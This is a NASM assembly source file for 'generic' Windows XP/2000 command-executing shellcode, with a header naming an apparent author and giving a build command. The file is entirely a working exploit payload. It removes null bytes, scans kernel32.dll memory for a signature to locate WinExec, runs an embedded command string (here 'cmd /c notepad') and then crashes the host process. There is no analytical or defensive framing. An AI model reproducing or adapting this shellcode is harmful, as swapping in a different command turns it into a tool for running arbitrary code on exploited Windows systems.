; Mostly Generic WinXP (Maybe 2K) SP independent
; command executing shellcode.
; Peter4020@hotmail.com
;
; nasmw -s -fbin -o gencmd.s gencmd.asm

bits 32

start:
jmp short data			; jump to call back for data address

continue:
pop edi				; edi = data address :o)
mov ecx, 11111111h		; max command length = 286331153 bytes ;o)
mov ebx, ecx			; save max command length

scan:
cld				; direction flag = 0 (auto increment)
mov al, 0ffh			; look for byte 0xff
repne scasb			; repeat while not found
xchg ebx, ecx			; when found, restore ecx; ebx = ecx - repetitions
sub ecx, ebx			; ecx = length of data string
add edi, 11111110h		; null friendly addition
sub edi, 11111111h		; sub one more than added = sub edi, 01h
inc byte [edi]			; make our 0xff a NULL
add ecx, 11111110h		; ...
sub ecx, 11111111h		; ...
sub edi, ecx			; edi = start of string
xor esi, esi			; clear esi
inc esi				; winexec; cmdshow; 01h (sw_normal)
push esi			; set up winexec
push edi			; ...

mov ebx, 0c458b66h		; signature string unique to winexec function
mov ecx, 11111111h		; trawl 286331153 bytes
mov edi, 77e60101h		; winxp kernel32.dll base + 0x0101 hex (null friendly)

trawlmem:
inc edi				; if not signature, move on
mov al, 066h			; look for start of signature string
repne scasb			; scan for start of signature string
jmp short checkbytes		; if start of sig. str. found, check whole sig.
nop				; (just to remove a nasty null)

checkbytes:
dec edi				; go back to start of possible start of sig. str.
push dword [edi]		; push data referenced by edi
pop esi				; pop the value into esi
cmp ebx, esi			; check with signature string
je gotcha			; if equal, we got our winexec!
jmp short trawlmem		; if not, let's try again ...

gotcha:
lea eax, [edi-16h]		; get to start of winexec function
call eax			; call winexec
int 3h				; crash process after executing command

data:
call continue			; call back
db "cmd /c notepad", 0ffh	; 	is there no end to the evil?